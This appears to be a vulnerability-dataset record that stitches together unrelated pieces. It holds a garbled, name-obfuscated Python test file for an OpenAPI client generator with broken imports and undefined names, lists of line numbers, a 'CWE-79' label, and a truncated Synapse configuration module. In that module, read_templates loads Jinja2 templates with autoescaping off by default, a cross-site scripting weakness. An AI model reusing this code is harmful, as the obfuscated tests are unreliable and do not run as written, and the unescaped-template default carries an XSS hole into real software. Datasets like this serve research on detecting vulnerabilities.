schemas=VAR_2.build.return_value,
enums=VAR_7.return_value,
)
VAR_5.components = None
VAR_2.build.reset_mock()
VAR_8 = GeneratorData.from_dict(VAR_6)
VAR_2.build.assert_not_called()
assert VAR_8.schemas == VAR_2()
def FUNC_1(self, VAR_1):
VAR_2 = VAR_1.patch(f"{VAR_0}.Schemas")
VAR_6 = {}
from openapi_python_client.parser.openapi import GeneratorData
VAR_8 = GeneratorData.from_dict(VAR_6)
assert VAR_8 == GeneratorError(
header="Failed to parse VAR_4 document",
detail=(
"2 validation errors for VAR_4\n"
"info\n"
" field required (type=value_error.missing)\n"
"paths\n"
" field required (type=value_error.missing)"
),
)
VAR_2.build.assert_not_called()
VAR_2.assert_not_called()
class CLASS_1:
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import Property
VAR_9 = oai.Schema.construct(
title=VAR_1.MagicMock(),
description=VAR_1.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": VAR_1.MagicMock(), "OptionalDateTime": VAR_1.MagicMock(),},
)
VAR_10 = VAR_1.MagicMock(autospec=Property)
VAR_11 = VAR_1.MagicMock()
VAR_10.get_imports.return_value = {VAR_11}
VAR_12 = VAR_1.MagicMock(autospec=Property)
VAR_13 = VAR_1.MagicMock()
VAR_12.get_imports.return_value = {VAR_13}
VAR_14 = VAR_1.patch(
f"{VAR_0}.property_from_data", side_effect=[VAR_10, VAR_12],
)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
VAR_16 = Model.from_data(VAR_39=VAR_9, name=VAR_1.MagicMock())
VAR_15.assert_called_once_with(VAR_9.title)
VAR_14.assert_has_calls(
[
VAR_1.call(name="RequiredEnum", required=True, VAR_39=VAR_9.properties["RequiredEnum"]),
VAR_1.call(name="OptionalDateTime", required=False, VAR_39=VAR_9.properties["OptionalDateTime"]),
]
)
VAR_10.get_imports.assert_called_once_with(VAR_62="")
VAR_12.get_imports.assert_called_once_with(VAR_62="")
assert VAR_16 == Model(
VAR_61=VAR_15(),
required_properties=[VAR_10],
optional_properties=[VAR_12],
relative_imports={VAR_11, VAR_13,},
description=VAR_9.description,
)
def FUNC_3(self, VAR_1):
VAR_9 = oai.Schema.construct(
title=VAR_1.MagicMock(),
description=VAR_1.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": VAR_1.MagicMock(), "OptionalDateTime": VAR_1.MagicMock(),},
)
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_14 = VAR_1.patch(f"{VAR_0}.property_from_data", return_value=VAR_17,)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
VAR_16 = Model.from_data(VAR_39=VAR_9, name=VAR_1.MagicMock())
VAR_15.assert_called_once_with(VAR_9.title)
VAR_14.assert_called_once_with(
name="RequiredEnum", required=True, VAR_39=VAR_9.properties["RequiredEnum"]
)
assert VAR_16 == VAR_17
class CLASS_2:
def FUNC_4(self, VAR_1):
VAR_18 = VAR_1.patch(f"{VAR_0}.Model.from_data")
VAR_9 = {"1": VAR_1.MagicMock(enum=None), "2": VAR_1.MagicMock(enum=None), "3": VAR_1.MagicMock(enum=None)}
VAR_19 = VAR_1.MagicMock()
VAR_20 = VAR_1.MagicMock()
VAR_21 = ParseError()
VAR_18.side_effect = [VAR_19, VAR_20, VAR_21]
from openapi_python_client.parser.openapi import .Schemas
VAR_16 = VAR_2.build(schemas=VAR_9)
VAR_18.assert_has_calls([VAR_1.call(VAR_39=value, name=name) for (name, value) in VAR_9.items()])
assert VAR_16 == VAR_2(
models={VAR_19.reference.class_name: VAR_19, VAR_20.reference.class_name: VAR_20,}, errors=[VAR_21]
)
def FUNC_5(self):
from openapi_python_client.parser.openapi import .Schemas
VAR_22 = oai.Reference.construct()
VAR_9 = {1: VAR_22}
VAR_16 = VAR_2.build(schemas=VAR_9)
assert VAR_16.errors[0] == ParseError(VAR_39=VAR_22, detail="Reference schemas are not supported.")
def FUNC_6(self, VAR_1):
from openapi_python_client.parser.openapi import .Schemas
VAR_18 = VAR_1.patch(f"{VAR_0}.Model.from_data")
VAR_23 = VAR_1.patch(f"{VAR_0}.EnumProperty")
VAR_9 = {"1": VAR_1.MagicMock(enum=["val1", "val2", "val3"])}
VAR_2.build(schemas=VAR_9)
VAR_23.assert_called()
VAR_18.assert_not_called()
class CLASS_3:
def FUNC_7(self, VAR_1):
VAR_24 = VAR_1.MagicMock()
VAR_25 = oai.RequestBody.construct(
content={
"application/x-www-form-urlencoded": oai.MediaType.construct(
media_type_schema=oai.Reference.construct(VAR_24=ref)
)
}
)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_form_body(VAR_25)
VAR_15.assert_called_once_with(VAR_24)
assert VAR_16 == VAR_15()
def FUNC_8(self):
VAR_25 = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_form_body(VAR_25)
assert VAR_16 is None
def FUNC_9(self, VAR_1):
VAR_24 = VAR_1.MagicMock()
VAR_25 = oai.RequestBody.construct(
content={"multipart/form-data": oai.MediaType.construct(media_type_schema=oai.Reference.construct(VAR_24=ref))}
)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_multipart_body(VAR_25)
VAR_15.assert_called_once_with(VAR_24)
assert VAR_16 == VAR_15()
def FUNC_10(self):
VAR_25 = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_multipart_body(VAR_25)
assert VAR_16 is None
def FUNC_11(self, VAR_1):
VAR_26 = VAR_1.MagicMock()
VAR_25 = oai.RequestBody.construct(
content={"application/json": oai.MediaType.construct(media_type_schema=VAR_26)}
)
VAR_14 = VAR_1.patch(f"{VAR_0}.property_from_data")
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_json_body(VAR_25)
VAR_14.assert_called_once_with("json_body", required=True, VAR_39=VAR_26)
assert VAR_16 == VAR_14()
def FUNC_12(self):
VAR_25 = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_json_body(VAR_25)
assert VAR_16 is None
def FUNC_13(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_27 = VAR_1.patch.object(Endpoint, "parse_request_form_body")
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
Endpoint._add_body(VAR_28, oai.Operation.construct())
VAR_27.assert_not_called()
def FUNC_14(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_1.patch.object(Endpoint, "parse_request_form_body")
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_1.patch.object(Endpoint, "parse_request_json_body", return_value=VAR_17)
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_29 = VAR_1.MagicMock()
VAR_16 = Endpoint._add_body(VAR_28, oai.Operation.construct(requestBody=VAR_29))
assert VAR_16 == ParseError(detail=f"cannot parse VAR_25 of VAR_28 {endpoint.name}", VAR_39=VAR_17.data)
def FUNC_15(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, Reference
from openapi_python_client.parser.properties import Property
VAR_29 = VAR_1.MagicMock()
VAR_30 = Reference.from_ref(VAR_24="a")
VAR_31 = Reference.from_ref(VAR_24="b")
VAR_27 = VAR_1.patch.object(
Endpoint, "parse_request_form_body", return_value=VAR_30
)
VAR_32 = VAR_1.patch.object(
Endpoint, "parse_multipart_body", return_value=VAR_31
)
VAR_33 = VAR_1.MagicMock(autospec=Property)
VAR_34 = VAR_1.MagicMock()
VAR_33.get_imports.return_value = {VAR_34}
VAR_35 = VAR_1.patch.object(Endpoint, "parse_request_json_body", return_value=VAR_33)
VAR_36 = VAR_1.patch(
f"{VAR_0}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_28 = Endpoint._add_body(VAR_28, oai.Operation.construct(requestBody=VAR_29))
VAR_27.assert_called_once_with(VAR_29)
VAR_35.assert_called_once_with(VAR_29)
VAR_32.assert_called_once_with(VAR_29)
VAR_36.assert_has_calls(
[
VAR_1.call(VAR_30, VAR_62="..models"),
VAR_1.call(VAR_31, VAR_62="..models"),
]
)
VAR_33.get_imports.assert_called_once_with(VAR_62="..models")
assert VAR_28.relative_imports == {"import_1", "import_2", "import_3", VAR_34}
assert VAR_28.json_body == VAR_33
assert VAR_28.form_body_reference == VAR_30
assert VAR_28.multipart_body_reference == VAR_31
def FUNC_16(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_37 = VAR_1.MagicMock()
VAR_38 = VAR_1.MagicMock()
VAR_39 = {
"200": VAR_37,
"404": VAR_38,
}
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_40 = VAR_1.patch(f"{VAR_0}.response_from_data", return_value=VAR_17)
VAR_41 = Endpoint._add_responses(VAR_28, VAR_39)
VAR_40.assert_called_once_with(status_code=200, VAR_39=VAR_37)
assert VAR_41 == ParseError(
detail=f"cannot parse VAR_41 of VAR_28 {endpoint.name}", VAR_39=VAR_17.data
)
def FUNC_17(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, Reference, RefResponse
VAR_37 = VAR_1.MagicMock()
VAR_38 = VAR_1.MagicMock()
VAR_39 = {
"200": VAR_37,
"404": VAR_38,
}
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_42 = Reference.from_ref(VAR_24="ref_1")
VAR_43 = Reference.from_ref(VAR_24="ref_2")
VAR_44 = RefResponse(status_code=200, VAR_61=VAR_42)
VAR_45 = RefResponse(status_code=404, VAR_61=VAR_43)
VAR_40 = VAR_1.patch(f"{VAR_0}.response_from_data", side_effect=[VAR_44, VAR_45])
VAR_36 = VAR_1.patch(
f"{VAR_0}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
VAR_28 = Endpoint._add_responses(VAR_28, VAR_39)
VAR_40.assert_has_calls(
[VAR_1.call(status_code=200, VAR_39=VAR_37), VAR_1.call(status_code=404, VAR_39=VAR_38),]
)
VAR_36.assert_has_calls(
[VAR_1.call(VAR_42, VAR_62="..models"), VAR_1.call(VAR_43, VAR_62="..models"),]
)
assert VAR_28.responses == [VAR_44, VAR_45]
assert VAR_28.relative_imports == {"import_1", "import_2", "import_3"}
def FUNC_18(self):
from openapi_python_client.parser.openapi import Endpoint
VAR_28 = Endpoint(
VAR_56="path", VAR_57="method", description=None, name="name", requires_security=False, tag="tag",
)
assert Endpoint._add_parameters(VAR_28, oai.Operation.construct()) == VAR_28
def FUNC_19(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_28 = Endpoint(
VAR_56="path", VAR_57="method", description=None, name="name", requires_security=False, tag="tag",
)
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_1.patch(f"{VAR_0}.property_from_data", return_value=VAR_17)
VAR_46 = oai.Parameter.construct(name="test", required=True, param_schema=VAR_1.MagicMock(), param_in="cookie")
VAR_16 = Endpoint._add_parameters(VAR_28, oai.Operation.construct(parameters=[VAR_46]))
assert VAR_16 == ParseError(VAR_39=VAR_17.data, detail=f"cannot parse parameter of VAR_28 {endpoint.name}")
def FUNC_20(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_28 = Endpoint(
VAR_56="path", VAR_57="method", description=None, name="name", requires_security=False, tag="tag",
)
VAR_1.patch(f"{VAR_0}.property_from_data")
VAR_46 = oai.Parameter.construct(name="test", required=True, param_schema=VAR_1.MagicMock(), param_in="cookie")
VAR_16 = Endpoint._add_parameters(VAR_28, oai.Operation.construct(parameters=[VAR_46]))
assert VAR_16 == ParseError(VAR_39=VAR_46, detail="Parameter must be declared in VAR_56 or query")
def FUNC_21(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
from openapi_python_client.parser.properties import Property
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_47 = VAR_1.MagicMock(autospec=Property)
VAR_48 = VAR_1.MagicMock()
VAR_47.get_imports = VAR_1.MagicMock(return_value={VAR_48})
VAR_49 = VAR_1.MagicMock(autospec=Property)
VAR_50 = VAR_1.MagicMock()
VAR_49.get_imports = VAR_1.MagicMock(return_value={VAR_50})
VAR_51 = VAR_1.MagicMock(autospec=Property)
VAR_52 = VAR_1.MagicMock()
VAR_51.get_imports = VAR_1.MagicMock(return_value={VAR_52})
VAR_14 = VAR_1.patch(
f"{VAR_0}.property_from_data", side_effect=[VAR_47, VAR_49, VAR_51]
)
VAR_53 = VAR_1.MagicMock()
VAR_54 = VAR_1.MagicMock()
VAR_55 = VAR_1.MagicMock()
VAR_39 = oai.Operation.construct(
parameters=[
oai.Parameter.construct(
name="path_prop_name", required=True, param_schema=VAR_53, param_in="path"
),
oai.Parameter.construct(
name="query_prop_name", required=False, param_schema=VAR_54, param_in="query"
),
oai.Parameter.construct(
name="header_prop_name", required=False, param_schema=VAR_55, param_in="header"
),
oai.Reference.construct(), # Should be ignored
oai.Parameter.construct(), # Should be ignored
]
)
VAR_28 = Endpoint._add_parameters(VAR_28, VAR_39)
VAR_14.assert_has_calls(
[
VAR_1.call(name="path_prop_name", required=True, VAR_39=VAR_53),
VAR_1.call(name="query_prop_name", required=False, VAR_39=VAR_54),
VAR_1.call(name="header_prop_name", required=False, VAR_39=VAR_55),
]
)
VAR_47.get_imports.assert_called_once_with(VAR_62="..models")
VAR_49.get_imports.assert_called_once_with(VAR_62="..models")
VAR_51.get_imports.assert_called_once_with(VAR_62="..models")
assert VAR_28.relative_imports == {"import_3", VAR_48, VAR_50, VAR_52}
assert VAR_28.path_parameters == [VAR_47]
assert VAR_28.query_parameters == [VAR_49]
assert VAR_28.header_parameters == [VAR_51]
def FUNC_22(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_56 = VAR_1.MagicMock()
VAR_57 = VAR_1.MagicMock()
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_58 = VAR_1.patch.object(Endpoint, "_add_parameters", return_value=VAR_17)
VAR_39 = oai.Operation.construct(
description=VAR_1.MagicMock(),
operationId=VAR_1.MagicMock(),
security={"blah": "bloo"},
responses=VAR_1.MagicMock(),
)
VAR_16 = Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="default")
assert VAR_16 == VAR_17
def FUNC_23(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_56 = VAR_1.MagicMock()
VAR_57 = VAR_1.MagicMock()
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_58 = VAR_1.patch.object(Endpoint, "_add_parameters")
VAR_59 = VAR_1.patch.object(Endpoint, "_add_responses", return_value=VAR_17)
VAR_39 = oai.Operation.construct(
description=VAR_1.MagicMock(),
operationId=VAR_1.MagicMock(),
security={"blah": "bloo"},
responses=VAR_1.MagicMock(),
)
VAR_16 = Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="default")
assert VAR_16 == VAR_17
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_56 = VAR_1.MagicMock()
VAR_57 = VAR_1.MagicMock()
VAR_58 = VAR_1.patch.object(Endpoint, "_add_parameters")
VAR_59 = VAR_1.patch.object(Endpoint, "_add_responses")
VAR_60 = VAR_1.patch.object(Endpoint, "_add_body")
VAR_39 = oai.Operation.construct(
description=VAR_1.MagicMock(),
operationId=VAR_1.MagicMock(),
security={"blah": "bloo"},
responses=VAR_1.MagicMock(),
)
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_39.description)
VAR_28 = Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="default")
assert VAR_28 == VAR_60.return_value
VAR_58.assert_called_once_with(
Endpoint(
VAR_56=path,
VAR_57=method,
description=VAR_39.description,
name=VAR_39.operationId,
requires_security=True,
tag="default",
),
VAR_39,
)
VAR_59.assert_called_once_with(VAR_58.return_value, VAR_39.responses)
VAR_60.assert_called_once_with(VAR_59.return_value, VAR_39)
data.security = None
VAR_58.reset_mock()
Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="a")
VAR_58.assert_called_once_with(
Endpoint(
VAR_56=path,
VAR_57=method,
description=VAR_39.description,
name=VAR_39.operationId,
requires_security=False,
tag="a",
),
VAR_39,
)
data.operationId = None
assert Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="a") == ParseError(
VAR_39=data, detail="Path operations with operationId are not yet supported"
)
class CLASS_4:
def FUNC_24(self, VAR_1):
from openapi_python_client.parser.openapi import .import_string_from_reference
from openapi_python_client.parser.reference import Reference
VAR_61 = VAR_1.MagicMock(autospec=Reference)
VAR_16 = VAR_36(VAR_61)
assert VAR_16 == f"from .{VAR_61.module_name} import {VAR_61.class_name}"
def FUNC_25(self, VAR_1):
from openapi_python_client.parser.openapi import .import_string_from_reference
from openapi_python_client.parser.reference import Reference
VAR_62 = VAR_1.MagicMock(autospec=str)
VAR_61 = VAR_1.MagicMock(autospec=Reference)
VAR_16 = VAR_36(VAR_61=reference, VAR_62=prefix)
assert VAR_16 == f"from {VAR_62}.{VAR_61.module_name} import {VAR_61.class_name}"
class CLASS_5:
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, VAR_3
VAR_63 = oai.Operation.construct()
VAR_64 = oai.Operation.construct(tags=["tag_2", "tag_3"])
VAR_65 = oai.Operation.construct()
VAR_39 = {
"path_1": oai.PathItem.construct(post=VAR_64, put=VAR_63),
"path_2": oai.PathItem.construct(get=VAR_65),
}
VAR_66 = VAR_1.MagicMock(autospec=Endpoint, tag="default", relative_imports={"1", "2"})
VAR_67 = VAR_1.MagicMock(autospec=Endpoint, tag="tag_2", relative_imports={"2"})
VAR_68 = VAR_1.MagicMock(autospec=Endpoint, tag="default", relative_imports={"2", "3"})
VAR_69 = VAR_1.patch.object(
Endpoint, "from_data", side_effect=[VAR_66, VAR_67, VAR_68]
)
VAR_16 = VAR_3.from_data(VAR_39=data)
VAR_69.assert_has_calls(
[
VAR_1.call(VAR_39=VAR_63, VAR_56="path_1", VAR_57="put", tag="default"),
VAR_1.call(VAR_39=VAR_64, VAR_56="path_1", VAR_57="post", tag="tag_2"),
VAR_1.call(VAR_39=VAR_65, VAR_56="path_2", VAR_57="get", tag="default"),
],
)
assert VAR_16 == {
"default": VAR_3(
"default", endpoints=[VAR_66, VAR_68], relative_imports={"1", "2", "3"}
),
"tag_2": VAR_3("tag_2", endpoints=[VAR_67], relative_imports={"2"}),
}
def FUNC_26(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, VAR_3, ParseError
VAR_63 = oai.Operation.construct()
VAR_64 = oai.Operation.construct(tags=["tag_2", "tag_3"])
VAR_65 = oai.Operation.construct()
VAR_39 = {
"path_1": oai.PathItem.construct(post=VAR_64, put=VAR_63),
"path_2": oai.PathItem.construct(get=VAR_65),
}
VAR_69 = VAR_1.patch.object(
Endpoint, "from_data", side_effect=[ParseError(VAR_39="1"), ParseError(VAR_39="2"), ParseError(VAR_39="3")]
)
VAR_16 = VAR_3.from_data(VAR_39=data)
VAR_69.assert_has_calls(
[
VAR_1.call(VAR_39=VAR_63, VAR_56="path_1", VAR_57="put", tag="default"),
VAR_1.call(VAR_39=VAR_64, VAR_56="path_1", VAR_57="post", tag="tag_2"),
VAR_1.call(VAR_39=VAR_65, VAR_56="path_2", VAR_57="get", tag="default"),
],
)
assert VAR_16["default"].parse_errors[0].data == "1"
assert VAR_16["default"].parse_errors[1].data == "3"
assert VAR_16["tag_2"].parse_errors[0].data == "2"
| [
3,
7,
9,
10,
17,
20,
22,
24,
37,
38,
41,
43,
46,
49,
51,
53,
55,
68,
69,
73,
90,
92,
94,
111,
122,
124,
126,
131,
133,
134,
143,
145,
147,
152,
155,
160,
163,
167,
169,
172,
173,
185,
187,
189,
192,
195,
197,
199,
201,
208,
210,
212,
215,
218,
220,
222,
224,
231,
233,
235,
238,
241,
243,
245,
247,
250,
261,
263,
265,
268,
282,
284,
286,
290,
300,
308,
318,
320,
335,
338,
356,
358,
363,
366,
390,
392,
401,
404,
408,
410,
413,
420,
423,
426,
432,
435,
439,
479,
481,
496,
499,
510,
512,
514,
517,
529,
531,
533,
536,
548,
550,
552,
566,
569,
571,
583,
588,
589,
594,
597,
599,
603,
607,
609,
610,
614,
628,
630,
644,
647,
658,
660,
671
] | [
3,
7,
9,
10,
17,
20,
22,
24,
37,
38,
41,
43,
46,
49,
51,
53,
55,
68,
69,
73,
90,
92,
94,
111,
122,
124,
126,
131,
133,
134,
143,
145,
147,
152,
155,
160,
163,
167,
169,
172,
173,
185,
187,
189,
192,
195,
197,
199,
201,
208,
210,
212,
215,
218,
220,
222,
224,
231,
233,
235,
238,
241,
243,
245,
247,
250,
261,
263,
265,
268,
282,
284,
286,
290,
300,
308,
318,
320,
335,
338,
356,
358,
363,
366,
390,
392,
401,
404,
408,
410,
413,
420,
423,
426,
432,
435,
439,
479,
481,
496,
499,
510,
512,
514,
517,
529,
531,
533,
536,
548,
550,
552,
554,
568,
571,
573,
585,
590,
591,
596,
599,
601,
605,
609,
611,
612,
616,
630,
632,
646,
649,
660,
662,
673
] |
1CWE-79
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017-2018 New Vector Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import errno
import os
import time
import urllib.parse
from collections import OrderedDict
from hashlib import sha256
from textwrap import dedent
from typing import Any, Callable, Iterable, List, MutableMapping, Optional
import attr
import jinja2
import pkg_resources
import yaml
class ConfigError(Exception):
"""Represents a problem parsing the configuration
Args:
msg: A textual description of the error.
path: Where appropriate, an indication of where in the configuration
the problem lies.
"""
def __init__(self, msg: str, path: Optional[Iterable[str]] = None):
self.msg = msg
self.path = path
# We split these messages out to allow packages to override with package
# specific instructions.
MISSING_REPORT_STATS_CONFIG_INSTRUCTIONS = """\
Please opt in or out of reporting anonymized homeserver usage statistics, by
setting the `report_stats` key in your config file to either True or False.
"""
MISSING_REPORT_STATS_SPIEL = """\
We would really appreciate it if you could help our project out by reporting
anonymized usage statistics from your homeserver. Only very basic aggregate
data (e.g. number of users) will be reported, but it helps us to track the
growth of the Matrix community, and helps us to make Matrix a success, as well
as to convince other networks that they should peer with us.
Thank you.
"""
MISSING_SERVER_NAME = """\
Missing mandatory `server_name` config option.
"""
CONFIG_FILE_HEADER = """\
# Configuration file for Synapse.
#
# This is a YAML file: see [1] for a quick introduction. Note in particular
# that *indentation is important*: all the elements of a list or dictionary
# should have the same indentation.
#
# [1] https://docs.ansible.com/ansible/latest/reference_appendices/YAMLSyntax.html
"""
def path_exists(file_path):
"""Check if a file exists
Unlike os.path.exists, this throws an exception if there is an error
checking if the file exists (for example, if there is a perms error on
the parent dir).
Returns:
bool: True if the file exists; False if not.
"""
try:
os.stat(file_path)
return True
except OSError as e:
if e.errno != errno.ENOENT:
raise e
return False
class Config:
"""
A configuration section, containing configuration keys and values.
Attributes:
section (str): The section title of this config object, such as
"tls" or "logger". This is used to refer to it on the root
logger (for example, `config.tls.some_option`). Must be
defined in subclasses.
"""
section = None
def __init__(self, root_config=None):
self.root = root_config
# Get the path to the default Synapse template directory
self.default_template_dir = pkg_resources.resource_filename(
"synapse", "res/templates"
)
def __getattr__(self, item: str) -> Any:
"""
Try and fetch a configuration option that does not exist on this class.
This is so that existing configs that rely on `self.value`, where value
is actually from a different config section, continue to work.
"""
if item in ["generate_config_section", "read_config"]:
raise AttributeError(item)
if self.root is None:
raise AttributeError(item)
else:
return self.root._get_unclassed_config(self.section, item)
@staticmethod
def parse_size(value):
if isinstance(value, int):
return value
sizes = {"K": 1024, "M": 1024 * 1024}
size = 1
suffix = value[-1]
if suffix in sizes:
value = value[:-1]
size = sizes[suffix]
return int(value) * size
@staticmethod
def parse_duration(value):
if isinstance(value, int):
return value
second = 1000
minute = 60 * second
hour = 60 * minute
day = 24 * hour
week = 7 * day
year = 365 * day
sizes = {"s": second, "m": minute, "h": hour, "d": day, "w": week, "y": year}
size = 1
suffix = value[-1]
if suffix in sizes:
value = value[:-1]
size = sizes[suffix]
return int(value) * size
@staticmethod
def abspath(file_path):
return os.path.abspath(file_path) if file_path else file_path
@classmethod
def path_exists(cls, file_path):
return path_exists(file_path)
@classmethod
def check_file(cls, file_path, config_name):
if file_path is None:
raise ConfigError("Missing config for %s." % (config_name,))
try:
os.stat(file_path)
except OSError as e:
raise ConfigError(
"Error accessing file '%s' (config for %s): %s"
% (file_path, config_name, e.strerror)
)
return cls.abspath(file_path)
@classmethod
def ensure_directory(cls, dir_path):
dir_path = cls.abspath(dir_path)
try:
os.makedirs(dir_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.isdir(dir_path):
raise ConfigError("%s is not a directory" % (dir_path,))
return dir_path
@classmethod
def read_file(cls, file_path, config_name):
cls.check_file(file_path, config_name)
with open(file_path) as file_stream:
return file_stream.read()
def read_templates(
self,
filenames: List[str],
custom_template_directory: Optional[str] = None,
autoescape: bool = False,
) -> List[jinja2.Template]:
"""Load a list of template files from disk using the given variables.
This function will attempt to load the given templates from the default Synapse
template directory. If `custom_template_directory` is supplied, that directory
is tried first.
Files read are treated as Jinja templates. These templates are not rendered yet.
Args:
filenames: A list of template filenames to read.
custom_template_directory: A directory to try to look for the templates
before using the default Synapse template directory instead.
autoescape: Whether to autoescape variables before inserting them into the
template.
Raises:
ConfigError: if the file's path is incorrect or otherwise cannot be read.
Returns:
A list of jinja2 templates.
"""
templates = []
search_directories = [self.default_template_dir]
# The loader will first look in the custom template directory (if specified) for the
# given filename. If it doesn't find it, it will use the default template dir instead
if custom_template_directory:
# Check that the given template directory exists
if not self.path_exists(custom_template_directory):
raise ConfigError(
"Configured template directory does not exist: %s"
% (custom_template_directory,)
)
# Search the custom template directory as well
search_directories.insert(0, custom_template_directory)
loader = jinja2.FileSystemLoader(search_directories)
env = jinja2.Environment(loader=loader, autoescape=autoescape)
# Update the environment with our custom filters
env.filters.update(
{
"format_ts": _format_ts_filter,
"mxc_to_http": _create_mxc_to_http_filter(self.public_baseurl),
}
)
for filename in filenames:
# Load the template
template = env.get_template(filename)
templates.append(template)
return templates
def _format_ts_filter(value: int, format: str):
return time.strftime(format, time.localtime(value / 1000))
def _create_mxc_to_http_filter(public_baseurl: str) -> Callable:
"""Create and return a jinja2 filter that converts MXC urls to HTTP
Args:
public_baseurl: The public, accessible base URL of the homeserver
"""
def mxc_to_http_filter(value, width, height, resize_method="crop"):
if value[0:6] != "mxc://":
return ""
server_and_media_id = value[6:]
fragment = None
if "#" in server_and_media_id:
server_and_media_id, fragment = server_and_media_id.split("#", 1)
fragment = "#" + fragment
params = {"width": width, "height": height, "method": resize_method}
return "%s_matrix/media/v1/thumbnail/%s?%s%s" % (
public_baseurl,
server_and_media_id,
urllib.parse.urlencode(params),
fragment or "",
)
return mxc_to_http_filter
class RootConfig:
"""
Holder of an application's configuration.
What configuration this object holds is defined by `config_classes`, a list
of Config classes that will be instantiated and given the contents of a
configuration file to read. They can then be accessed on this class by their
section name, defined in the Config or dynamically set to be the name of the
class, lower-cased and with "Config" removed.
"""
config_classes = []
def __init__(self):
self._configs = OrderedDict()
for config_class in self.config_classes:
if config_class.section is None:
raise ValueError("%r requires a section name" % (config_class,))
try:
conf = config_class(self)
except Exception as e:
raise Exception("Failed making %s: %r" % (config_class.section, e))
self._configs[config_class.section] = conf
def __getattr__(self, item: str) -> Any:
"""
Redirect lookups on this object either to config objects, or values on
config objects, so that `config.tls.blah` works, as well as legacy uses
of things like `config.server_name`. It will first look up the config
section name, and then values on those config classes.
"""
if item in self._configs.keys():
return self._configs[item]
return self._get_unclassed_config(None, item)
def _get_unclassed_config(self, asking_section: Optional[str], item: str):
"""
Fetch a config value from one of the instantiated config classes that
has not been fetched directly.
Args:
asking_section: If this check is coming from a Config child, which
one? This section will not be asked if it has the value.
item: The configuration value key.
Raises:
AttributeError if no config classes have the config key. The body
will contain what sections were checked.
"""
for key, val in self._configs.items():
if key == asking_section:
continue
if item in dir(val):
return getattr(val, item)
raise AttributeError(item, "not found in %s" % (list(self._configs.keys()),))
def invoke_all(self, func_name: str, *args, **kwargs) -> MutableMapping[str, Any]:
"""
Invoke a function on all instantiated config objects this RootConfig is
configured to use.
Args:
func_name: Name of function to invoke
*args
**kwargs
Returns:
ordered dictionary of config section name and the result of the
function from it.
"""
res = OrderedDict()
for name, config in self._configs.items():
if hasattr(config, func_name):
res[name] = getattr(config, func_name)(*args, **kwargs)
return res
@classmethod
